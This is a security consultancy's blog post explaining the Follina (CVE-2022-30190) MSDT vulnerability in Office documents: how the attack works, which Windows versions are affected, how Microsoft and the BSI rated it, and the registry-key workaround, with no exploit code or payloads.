Penetration TestJan Kahmen9 min read

Follina: Attacks via Office Files

Known as Follina, the CVE-2022-30190 vulnerability is currently one of the most serious vulnerabilities for Office files.

Table of content

The CVE-2022-30190 vulnerability known as Follina is currently one of the most serious security vulnerabilities. It allows an exploit of the Windows Support Diagnostics Tool directly via Microsoft Office. The fact that this bug has not yet been fixed makes the Windows vulnerability particularly worrying: after all, Office is a common tool - and thus extremely interesting for cybercriminals.

What is the Follina vulnerability aka CVE-2022-30190?

The CVE-2022-30190 vulnerability lies in the Microsoft Windows Support Diagnostics Tool (MSDT). It may seem negligible at first glance, but this Microsoft Office vulnerability provides an active entry point for cybercriminals. The reason for this is the implementation of the tool, which can be exploited by a virus in Microsoft Office files. This includes not only classic MS Word documents, but also other file types.

How Does the Attack via Office Files Work?

The attack via Microsoft's software can look like this: The attacker creates a malicious document by injecting a virus in the Microsoft Office file. He then sends this file to potential victims. The most common variant is via an e-mail attachment. Often, the necessary social engineering is done beforehand to make sure that the content of the email is interesting enough for you to open it.
If you do not recognize the message as malware, then open a file that contains malicious code. For example, this could be a link to an HTML file or a JavaScript code. This, in turn, executes the code via MSDT.
As a result, the attackers can install programs as part of their exploit. Alternatively, of course, the cybercriminals can view, modify or destroy data.

Attacks via CVE-2022-30190 are Widespread

Office products have not just been used since the cloud transformation: for many people, they are an integral part of everyday (work) life. That makes the zero-day vulnerability all the more risky. After all, this Microsoft Office vulnerability offers enormous potential for cybercriminals. Some of them just want to cause mischief - other attackers steal your credentials and information to sell them afterwards.
However, the fatal thing about Follina is that it is relatively easy to exploit. That is why it is excellent for spreading malware and spying on data.
As a user, all you have to do is download the disguised Microsoft Office document - not even open it. Even previewing it via Windows Explorer is enough to activate the malicious code. This makes it all the more important that you recognize such emails as malware and take security measures immediately. A regular penetration test for SMBs will also help you keep an eye on the state of your IT security.

These Microsoft Products are Affected by Follina

The fact that companies benefit from a well-thought-out security concept has not just been known since Follina. Only recently, the Log4j zero-day vulnerability or the PrintNightmare caused a stir. Now the CVE-2022-30190 vulnerability proves that reliable incident response management is essential in the enterprise: after all, the number of Microsoft Office users is large.
However, the hope that the Windows vulnerability would only affect certain versions of Microsoft products was not fulfilled. Since the target of the attack is the MSDT, attackers can use it on all currently popular Windows operating systems. These include:

  • All Microsoft Windows versions from version 7 onwards.
  • All server versions from Windows Server 2008
  • All Microsoft Office applications
    The lack of specific affected products already shows how critical the vulnerability is. It offers enormous potential for cyberattacks, which will be even more serious in the context of cloud transformation. Nevertheless, it is initially classic Word files that the hackers are using.

BSI and Microsoft Increase their Risk Assessment

While Microsoft still classified the vulnerability as "not security relevant" on April 12, 2022, the situation has since changed. It is now rated 7.8 out of 10 by the Microsoft Security Response Center. This upgrade in severity was accompanied by Microsoft announcing work on a security update.
The BSI (German Federal Office for Information Security) also recognized the danger of the vulnerability and declared warning level 3 on May 31, 2022. This is the second-highest level, signifying a business-critical IT threat situation with massive disruptions to regular operations.
What has Microsoft done so far?
Microsoft has since acknowledged the danger posed by the vulnerability. Nevertheless, the date for a security update has not yet been set. Instead, Microsoft and the BSI recommend temporarily disabling the MSDT URL protocol handlers.

This is what Makes the Follina Vulnerability so Treacherous

The tricky part of the problem is the direct call to the MSDT. Using selected parameters, it is possible to remotely reload and execute the URI handler code. As mentioned above, you do not even have to open the Word file to do this.
Documents cause damage even if unopened
One of the biggest dangers of the vulnerability is that even unopened files can cause damage. This includes not only Word formats, but also RTF documents. Both can be prepared with malicious code by cybercriminals. To execute this malicious code, it is not necessary to open the file. Just previewing it in Explorer is enough to invoke it.
For users of a network drive, this also means that as soon as a user files the document and opens the folder, all users with the preview view enabled are affected.
Previous solutions from Microsoft are not sufficient
Unfortunately, there is currently no solution from Microsoft for the CVE-2022-30190 vulnerability. Only a Guidance Support document that shows you how to mitigate the vulnerability. The Follina vulnerability, which has been known since April, thus remains an open risk for numerous companies.

Here's How Companies can Arm Themselves Against Follina

Microsoft's official fix gives hope that a permanent patch will be available soon. Until then, it is important to keep potential security risks in check with a security concept and regular pentests. One of the most important solutions at the moment is to break the relationship between the MSDT.EXE utility and ms-msdt: URLs.
Microsoft itself recommends disabling the MSDT URL protocol. This requires administrator privileges. The command for this is reg delete HKEY_CLASSES_ROOT\ms-msdt.
Before executing it, it is advisable to back up the registry. This will allow you to restore the original state once the workaround is no longer necessary.
Also important: Be even more careful than usual regarding your email attachments. Especially if there are Microsoft documents in the attachment. Regardless of prevailing security vulnerabilities, for example, regular static code analysis as a software testing procedure is an important step towards improving your IT security.

Conclusion - Still Waiting for a Permanent Patch

A permanent patch is not yet in sight for the Follina vulnerability. Since the vulnerability was already disclosed in March and April 2022, the lack of a patch is a cause for concern. However, as soon as one is available, you should definitely use it!
Still, this prospect is not enough: Most companies sooner or later suffer an attack that they have to deal with. In such an emergency, it is necessary to be able to fall back on a functioning incident response management.
The underlying security concept as well as a regular penetration test for SMEs and static code analysis help you to mitigate the dangers. After all, vulnerabilities such as the Log4j zero-day vulnerability, the PrintNightmare or Follina can occur again and again.
Being well prepared for such incidents is therefore essential. In particular, training by experts prepares you and your employees and shows you what is important in an emergency.

Contact

Curious? Convinced? Interested?

Schedule a no-obligation initial consultation with one of our sales representatives. Use the following link to select an appointment: